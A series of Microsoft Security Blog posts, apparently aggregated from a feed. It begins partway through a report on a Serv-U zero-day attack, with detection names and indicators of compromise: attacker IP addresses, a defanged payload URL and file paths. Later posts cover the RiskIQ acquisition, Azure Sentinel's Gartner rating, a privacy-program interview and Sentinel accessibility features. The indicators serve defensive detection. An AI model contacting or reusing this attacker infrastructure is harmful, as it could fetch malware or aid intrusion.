  • Behavior:Win32/ServuSpawnSuspProcess.A
  • Behavior:Win32/ServuSpawnCmdClientCommon.A
Endpoint detection and response (EDR) alerts

Alerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:

  • Suspicious behavior by Serv-U.exe
Azure Sentinel query

To locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

Indicators of compromise (IOCs)
  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp

The post Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft to acquire RiskIQ to strengthen cybersecurity of digital transformation and hybrid work

Microsoft Malware Protection Center - Mon, 07/12/2021 - 11:10am

Organizations are increasingly using the cloud to reimagine every facet of their business. Hybrid work has accelerated this digital transformation, and customers are challenged with the increasing sophistication and frequency of cyberattacks. Today, Microsoft is announcing that we have entered into a definitive agreement to acquire RiskIQ, a leader in global threat intelligence and attack surface management, to help our shared customers build a more comprehensive view of the global threats to their businesses, better understand vulnerable internet-facing assets, and build world-class threat intelligence.

As organizations pursue this digital transformation and embrace the concept of Zero Trust, their applications, infrastructure, and even IoT applications are increasingly running across multiple clouds and hybrid cloud environments. Effectively the internet is becoming their new network, and it’s increasingly critical to understand the full scope of their assets to reduce their attack surface.

RiskIQ helps customers discover and assess the security of their entire enterprise attack surface—in the Microsoft cloud, AWS, other clouds, on-premises, and from their supply chain. With more than a decade of experience scanning and analyzing the internet, RiskIQ can help enterprises identify and remediate vulnerable assets before an attacker can capitalize on them.

“The vision and mission of RiskIQ is to provide unmatched internet visibility and insights to better protect and inform our customers and partners’ security programs. We’re thrilled to add RiskIQ’s Attack Surface and Threat Intelligence solutions to the Microsoft Security portfolio, extending and accelerating our impact. Our combined capabilities will enable best-in-class protection, investigations, and response against today’s threats.”—RiskIQ Cofounder and CEO Elias Manousos

In addition, RiskIQ offers global threat intelligence collected from across the internet, crowd-sourced through its PassiveTotal community of security researchers and analyzed using machine learning. Organizations can leverage RiskIQ threat intelligence to gain context into the source of attacks, tools and systems, and indicators of compromise to detect and neutralize attacks quickly.

The combination of RiskIQ’s attack surface management and threat intelligence empowers security teams to assemble, graph, and identify connections between their digital attack surface and attacker infrastructure and activities to help provide increased protection and faster response.

Microsoft has long been a leader in delivering end-to-end cloud-native security with Microsoft 365 Defender, Microsoft Azure Defender, and Microsoft Azure Sentinel that help protect, detect, and respond to threats in multi-cloud and hybrid cloud environments. With the acquisition of RiskIQ, we will continue our mission to help customers defend their growing digital estate against increasing cyber threats.

RiskIQ has built a strong customer base and community of security professionals who we will continue to support, nurture, and grow. RiskIQ’s technology and team will be a powerful addition to our security portfolio to best serve our mutual customers. For more information about RiskIQ check out their website or request a demo.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 

The post Microsoft to acquire RiskIQ to strengthen cybersecurity of digital transformation and hybrid work appeared first on Microsoft Security Blog.

Categories: Microsoft

Microsoft named a Visionary in the 2021 Gartner Magic Quadrant for SIEM for Azure Sentinel

Microsoft Malware Protection Center - Thu, 07/08/2021 - 2:00pm

We’re pleased to announce that in its first year of inclusion in the Gartner Magic Quadrant report, Microsoft Azure Sentinel has been named a Visionary, where we were recognized for our completeness of vision for SIEM.1

Gartner has said that “cloud SIEM will be the future of how many organizations consume technology.”2 We wholeheartedly agree! Today, security teams are constantly asked to do more with less. They need to protect expanding digital estates, detect increasingly advanced threats through huge amounts of noise, and keep up with a massive backlog of investigations.

Azure Sentinel is built from the ground up to be completely cloud-native, and it enables security teams to focus on protecting their organizations instead of maintaining infrastructure. It collects, correlates, and analyzes data at cloud scale across the entire organization, resulting in higher efficiency and more effective security analytics.

We released Azure Sentinel in November 2019 as the first cloud-native SIEM on a major public cloud. Since then, we’ve helped more than 9,000 customers across a broad range of verticals modernize their security operations and have received industry recognition for our market-leading approach.

One of the most fulfilling things about working on Azure Sentinel has been seeing our customers realize the value of our vision firsthand. At MVP Healthcare, moving SecOps to the cloud gave the security team unprecedented agility, allowing them to react and scale faster. At ASOS, Azure Sentinel empowered the security team to cut issue resolution times in half. And at LinkedIn, moving to Azure Sentinel allowed them to significantly reduce operational overhead, plus reduce investigation times dramatically.

We’re honored that we have been able to help so many organizations during Azure Sentinel’s short time in market and are thrilled that we were recognized in this Gartner report for our vision for the future of SIEM.

Looking back and looking forward

While we’re excited about how far we’ve come in the last year and a half, we’re just getting started. Every day, we’re learning from customers and partners about how we can improve. And we aren’t slowing down—empowering SecOps with new innovations for Azure Sentinel is one of the highest priorities for our security engineering team.

In 2021, we’ve delivered key innovations across a variety of investment areas, including data collection, AI, machine learning, automation, and much more. A few highlights include:

  • Expanding visibility across all security assets, platforms, and clouds with more than 50 new connectors, including for security solutions like Cisco Umbrella, ITSM solutions like ServiceNow, and other clouds—with many more in development.
  • Enabling efficiency and faster response with automation innovations such as the release of automation rules, a simple framework for leveraging automation that’s highly integrated into the day-to-day SecOps workstream, as well as new automation connectors and playbooks.
  • Helping security teams deploy integrations and use cases faster with solutions, which allow you to deploy connectors, workbooks, playbooks, detections, and all other content related to integration in one package.
  • Empowering SecOps with integrated SIEM and XDR, such as Microsoft 365 Defender incidents integration, allowing users to seamlessly pivot between the breadth of SIEM and the depth of XDR while investigating.
  • Democratizing machine learning with customizable machine learning anomalies, which gives security analysts a code-free experience to customize machine learning to their individual organizations and use them in detections and threat hunting.
  • And much more. We invite you to read more about our recent innovations from Microsoft Ignite 2021 and from the recent RSA Conference 2021.

We have a long and exciting journey ahead and we look forward to helping you further streamline and strengthen your security—and enabling SecOps to be more efficient and effective than ever.

As always, to our customers, thank you for coming with us on this journey. We love working with you and hearing your feedback!

Learn more

If you’re ready to get started with Azure Sentinel, we invite you to sign up for a trial today.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

1Gartner, Magic Quadrant for Security Information and Event Management Kelly Kavanagh, Toby Bussa, John Collins, 29 June 2021.

2“Questions to Answer Before Adopting Cloud SIEM Solutions”, Kelly Kavanagh, Gorka Sadowski, Toby Bussa, July 27 2020.

The post Microsoft named a Visionary in the 2021 Gartner Magic Quadrant for SIEM for Azure Sentinel appeared first on Microsoft Security Blog.

Categories: Microsoft

How to build a privacy program the right way

Microsoft Malware Protection Center - Wed, 07/07/2021 - 2:00pm

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Product Marketing Manager Natalia Godyla talks with attorney Whitney Merrill, an expert on privacy legal issues and Data Protection Officer and Privacy Counsel at Asana. The thoughts below reflect her views, not the views of her employer, and are not legal advice. In this blog, Whitney talks about building a privacy program and offers best practices for privacy training.

Natalia: How do security, privacy, and regulatory compliance intersect?

Whitney: Security and privacy are closely related but not the same. Privacy is not possible without security. In the last 5 to 10 years, regulations in privacy and security have taken very different paths. Most regulations across the world fall to a standard of reasonable security, whereas privacy is much more prescriptive about the types of behaviors or rights that individuals can exercise from a compliance perspective. Companies look to common security frameworks like ISO 27001 or SOC 2, but privacy doesn’t really have that. That’s born from the fact that security feels very black and white. You can secure something, or you can’t.

In privacy, however, there’s a spectrum of beliefs about how data can be used. It’s much more grey. There were attempts in the early 2010s with Do Not Track, the proposed HTTP header field that let internet users opt-out of website tracking. That fell apart. Privacy and regulatory compliance have diverged, and much of it is because of fundamental disagreements between the ad industry and privacy professionals. You see this with cookie banners in the European Union (EU). They’re not a great user experience, and people don’t love interacting with them. They exist because there have been enough regulations like the Electronic Privacy Directive and General Data Protection Regulation (GDPR) that essentially require those types of banners.

Natalia: Who should be involved in privacy, and what role should they play?

Whitney: It’s very important to get privacy buy-in from the highest levels of the company. Not only do you have an obligation under GDPR to have a Data Protection Officer that reports to the highest levels of a company if you’re processing European data, but an open dialogue with leadership about privacy will help establish company cultural values around the processing of data. Are you a company that sells data? How much control will your users and customers have over their data? How granular should those controls be? Do you collect sensitive data (like health or financial data), or is that something that you want to ban on your platform?

The sooner you get buy-in from leadership and the sooner you build privacy into your tools, the easier it’s going to be in the long run. It doesn’t have to be perfect, but a good foundation will be easier to build upon in the future. I’d also love to see the venture capital community incentivizing startups and smaller companies to care about privacy and security as opposed to just focusing on growth. It’s apparent that startups aren’t implementing the privacy lessons learned by other companies that have already seen privacy enforcement from a privacy regulator. As a result, the same privacy issues pop up over and over. Obviously, regulators will play a role. In addition to enforcement, education and guidance from regulators are vital to helping companies build privacy by design into their platforms.

Natalia: What does a privacy attack look like, and which attacks should companies pay attention to?

Whitney: A privacy attack can look very similar to a security attack. A data breach, for instance, is a privacy attack: it leaks confidential information. A European regulator recently called a privacy bug a breach. In this particular case, a bug in the software caused the information to be made public that the user had marked as private. Folks generally associate data breaches with an attacker, but often accidental disclosures or privacy bugs can cause data breaches. I’ve talked with folks who say, “Wow, I never thought of that as a security breach,” which is why it’s important to engage your legal team when major privacy or security issues pop up. You might have regulatory reporting obligations that aren’t immediately apparent. Other privacy attacks aren’t necessarily data breaches. Privacy attacks can also include attempts to deanonymize data sets, or they might be privacy bugs that use or collect data in a way that is unanticipated by the user. You might design a feature to only collect a certain type of data when in reality, it’s collecting much more data than was intended or disclosed in a privacy notice.

On the more adversarial side of privacy attacks, an attacker could try to leverage weaknesses and processes around privacy rights to access personal information or erase somebody’s account. An attacker could use the information they find out about an individual online to try to get more information about that individual via a data subject rights process (like the right to get access to your data under global privacy laws). There were a few cases of this after the GDPR went into effect. An attacker used leaked credentials to a user’s account to download all of the data that the service had about that individual. As such, it’s important to properly verify the individual making the request, and if necessary, build in additional checks to prevent accidental disclosure.

Natalia: How should a company track accidental misuse of someone’s information or preferences?

Whitney: It’s very hard. This is where training, culture, and communication are really important and valuable. Misuse of data is unfortunately common. If a company is collecting personal data for a security feature like multifactor authentication, they should not also use that phone number for marketing and advertising purposes. That goes beyond the original scope and is a misuse of that phone number. To prevent this, you need to think about security controls. Who has access to the data? When do they have access to the data? How do you document and track access to the data? How do you audit those behaviors? That’s where security and privacy deeply overlap because if you get alignment there, it’s going to be a lot easier to manage the misuse of data.

It’s also a good idea to be transparent about incidents when they occur because it builds trust. Of course, companies should work closely with their legal and PR teams when deciding to publicly discuss incidents, but when I see a news article about a company disclosing that they had an incident and then see a detailed breakdown of that incident from the company (how they investigated and fixed the issue), I usually think, “Thanks for telling me. I know you were not necessarily legally required to disclose that. But I trust you more now because I now know that you’re going to let me know the next time something happens, especially something that could be perceived as worse.” Privacy isn’t just about complying with the law. It’s about building trust with your users so they understand what’s happening with their data.

Natalia: What are best practices for implementing a privacy program?

Whitney: When you build a privacy program, look at the culture of the company. What are its values, and how do you link privacy to those values? It’s going to vary from company to company. The values of a company with a business model based on the use or sale of data are going to be different than a company that sells hardware and doesn’t need to collect data as its main source of revenue.

It’s easy for companies to look at new privacy laws–like GDPR and the California Consumer Privacy Act (CCPA)–and say, “Let’s just do that,” without thinking through the broader implications. That’s the wrong approach. Yes, you want to comply with privacy laws, but compliance does not equal security or privacy. If you’re constantly reactive to only what privacy law requires, you’ll tire out quickly because it’s changing and growing rapidly. Privacy is the future. Instead, think more holistically and proactively when it comes to privacy. Instead of rolling out a process to comply with only one region and one law, consider rolling it out for all users in all regions, so when a new region implements a similar law or regulation, you’ll be most of the way there. Just because you’re compliant with GDPR doesn’t mean you’re a privacy-focused company or that you process information in the most privacy-centric way. But you’re moving in that direction, and you can build on that foundation. Another best practice is to find campaigners across the company who support privacy efforts. If you don’t have a dedicated privacy resource, that doesn’t mean you can’t build a culture of privacy within your company. Work with privacy-minded employees to seek out the easy privacy wins, such as making sure your privacy policy is up to date and reflective of your practices. Focus on those to build support around privacy within the company.

Putting my former regulator hat on, privacy culture is important. When the Federal Trade Commission (FTC) comes knocking at your door, they’re looking to see if you have the right intentions and are trying to do your best, not just whether you prescriptively failed to do this one thing that you should have done. They look at the size of the company, and its maturity, resources, and business model in determining how they’ll enforce against that company. Showing that you care, isn’t going to necessarily fix your problems, but it will definitely help.

Natalia: How should companies train employees on privacy issues?

Whitney: Training should happen regularly. However, not all training needs to be really detailed or cover the same material—shake it up. The aim of training employees on privacy issues is to cultivate a culture of privacy. For example, when employees onboard, they’re new and excited about joining a new company. They’re not going to remember everything so keep privacy training high-level. Focus on the cultural side of privacy so they get an idea of how to think about privacy in their role. From there, give them the resources to empower themselves to learn more about privacy (like articles and additional training). Annual training is a good way to remind people of the basics, but there are many people who are going to tune those out, so make them funny and engaging if you can. I love using memes, funny themes, or recent events to help draw the audience in.

As the privacy program matures, I recommend creating a training program that fits each team and their level of data access or most commonly used tools. For example, some customer service teams have access to user data and the ability to help users in a way that other teams may not, so training should be tailored to address their specific personal data access and tooling abilities. They may also be more likely to record calls for quality and training purposes, so training around global call recording laws and requirements may be relevant. The more you target training toward specific tools and use cases, the better it’s going to be because the employee can better understand how that training relates to their everyday work.

Natalia: What encryption strategies can companies implement to strengthen privacy?

Whitney: Encrypt your databases at rest. Encrypt data in transit. It is no longer acceptable to have an S3 bucket or a database that is not encrypted at rest, especially if that system stores personal data. At the moment, enterprise key management (EKM) is a popular data protection feature involving encryption. EKM gives a company the ability to manage the encryption key for the service that they are using. For instance, a company using Microsoft services may want to control that key so that they have ownership over who can access the data, rotate the key, or delete the key so no one can access the data ever again.

The popularity of EKM is driven by trends in security and Schrems II, which was a major decision from the Court of Justice of the European Union last summer. This decision ruled Privacy Shield, the safe harbor for data transfers from the EU to the United States, invalid for not adequately protecting personal data. Subsequently, the European Data Protection Board (EDPB) issued guidance advising data be encrypted before being transferred to help secure personal data when transferred to a region that might present risks. Encryption is vital when talking about and implementing data protection and will continue to be in the future.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to build a privacy program the right way appeared first on Microsoft Security Blog.

Categories: Microsoft

Accessibility and usability for all in Azure Sentinel

Microsoft Malware Protection Center - Wed, 07/07/2021 - 12:00pm

As a father of a child on the Autism spectrum who relies completely on digital media for his learning, I fully appreciate the impact that digital accessibility can have on people with disabilities. Designing with accessibility in mind greatly expands the impact of Microsoft solutions. What many don’t realize, however, is that the impact of accessible design is even bigger than that. When we design for accessibility, everyone benefits.

For example, television video captioning was initially designed for the benefit of people who are hard-of-hearing. Today, it’s far more widely used, such as in loud places where people still want to watch TV and follow the context of the images. We at Microsoft and many of our customers make extensive use of video captioning in Microsoft Teams meetings. This makes the meetings not just accessible, but also convenient for people who may need to join meetings in noisy places—a perfect example of the widespread benefits of accessible design. Microsoft’s product design principles are based on a consistent approach: taking a disability-inclusive mindset in all product designs to strive to deliver a better user experience for all.

Consistent with this philosophy, Azure Sentinel already includes accessibility features that conform to the Web Content Accessibility Guidelines (WCAG), among others. We are now taking this commitment a step further by adding another significant useability enhancement delivered through responsive design. Responsive design is a software development approach that optimizes an application’s user interface to adapt to various screen sizes, ranging from small, medium, to large glass. It allows developers to make efficient use of screen space, leverage specific features on a particular device, and optimize for various forms of input with the goal of improving user experience regardless of the choice of form factor. Beyond ease of use, digital accessibility can have far-reaching benefits in broadening opportunities for people of all abilities. To learn more about the role Microsoft is playing, read the blog Doubling down on accessibility: Microsoft’s next steps to expand accessibility in technology, the workforce and workplace.

Responsive design benefits in Azure Sentinel

Without responsive design, security operations center (SOC) analysts trying to use Azure Sentinel would experience difficulty when trying to navigate around the interface, especially if they are using a mobile device. For example, they would need to scroll to the right side in order to visualize pages with large amounts of text, increasing the friction they experience while trying to get their work done. With Azure Sentinel incorporating responsive design in the user interface, users can now expect an enriched experience in the following key areas:

Mobile access

Responsive design now enhances the usability of the Azure Sentinel portal from any device, including browsers on mobile phones. This now greatly improves the convenience of using the products and facilitates the mobility of the experience, allowing users to access the portal from light-weight devices that the users typically carry with them. When it comes to incident response, time is of the essence—the ability to respond from anywhere from a portable device is of great benefit. Below is a screenshot of an incident in Azure Sentinel opened from a mobile phone.

Figure 1: Azure Sentinel incident opened on a mobile device.

Enhanced zoom

It is now possible to zoom in to up to 400 percent without distorting user interface elements. This capability makes it possible to move away from the constraints of fixed-width designs to one that adjusts screen elements without distorting them even when a user zooms to such high percentages. As a result, the capability significantly improves the accessibility of the user interface to users with low vision or even to anyone who prefers to read larger text. For users with limited dexterity, the ability to enlarge text makes user interface elements larger, making selections easier.

Figure 2: Azure Sentinel Analytics blade at 400 percent zoom at 1920×1080 display resolution.

Content reflow

The ability to accommodate different viewport sizes across devices of varying sizes without requiring the user to perform multiple scrolling operations is of significant benefit to anyone with accessibility needs and is a desirable user experience for any other user. With content reflow, the content automatically adjusts to fit the screen size, eliminating the need for horizontal scrolling to view content as depicted below:

Figure 3: Example of how text reflows from a large to small glass device and vice versa.

Linear order

Linear order is important for structure as it maintains predictability when navigating through content (like the appearance of columns in the source order determines how screen readers or Windows narrator reads out the content). With reflow, the order of item presentation in the user interface is preserved, which makes for a consistent and accessible experience. For example, users typically expect the flow to be from left to right, top to bottom as depicted in the image below.

Figure 4. Example of the linear order for mobile screen view.

One billion. This is the number of people with disabilities across the world. Designing software or hardware with this population in mind pushes the limits of creativity to new boundaries, resulting in improved products and user experiences for all. Additionally, it increases the chances for people with disabilities to be gainfully employed with jobs that have been enabled by accessible technology. By proactively building accessibility into product designs right at the onset, we at Microsoft make technology adapt to user preferences as opposed to the other way round. We are excited that the new reflow-powered features in Azure Sentinel will make the product more usable and the experience more portable for our customers. Log in to your Azure Sentinel portal today from a device of any size and respond to incidents from the convenience of your favorite device.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Special thanks to Ishan Soni for his input and Menny Mezamar-Tov and the rest of the accessibility engineering team for building the reflow capability into Azure Sentinel.

The post Accessibility and usability for all in Azure Sentinel appeared first on Microsoft Security Blog.

Categories: Microsoft

Pages